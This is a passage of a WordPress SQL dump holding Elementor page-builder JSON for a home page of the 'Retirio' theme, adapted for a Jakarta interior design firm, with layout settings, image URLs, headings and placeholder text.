da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(3256,4771,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3257,4771,'_elementor_pro_version','3.8.1'),(3258,4771,'_elementor_css','a:6:{s:4:\"time\";i:1685011164;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3259,4772,'_wp_page_template','elementor_header_footer'),(3260,4772,'_elementor_edit_mode','builder'),(3261,4772,'_elementor_template_type','wp-page'),(3262,4772,'_elementor_version','3.8.1'),(3263,4772,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center 